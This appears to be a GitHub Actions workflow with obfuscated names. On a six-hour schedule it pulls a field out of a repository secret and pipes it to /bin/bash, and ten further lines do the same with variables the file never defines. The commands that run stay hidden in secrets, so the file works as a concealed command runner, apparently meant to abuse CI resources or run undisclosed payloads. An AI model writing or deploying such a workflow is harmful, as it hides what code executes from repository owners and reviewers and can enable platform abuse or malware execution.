name: caocao19870104

on:
  workflow_dispatch:
  schedule:
    - cron: '3 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: caocao19870104
        env:
          bx87075: ${{ secrets.bx87075 }}
        run: |
          echo $bx87075 | jq -r .voo4193 | /bin/bash
          echo $zr35 | jq -r .p16 | /bin/bash
          echo $l6 | jq -r .nc63868 | /bin/bash
          echo $sya46 | jq -r .k5101 | /bin/bash
          echo $gnu87318 | jq -r .ag96193 | /bin/bash
          echo $ma651 | jq -r .milt61492 | /bin/bash
          echo $kyjvg6511 | jq -r .qzbfw50 | /bin/bash
          echo $aplc1357 | jq -r .vg3230 | /bin/bash
          echo $fomdu32 | jq -r .kbejg93579 | /bin/bash
          echo $on2 | jq -r .q69368 | /bin/bash
          echo $zg68 | jq -r .k4599 | /bin/bash

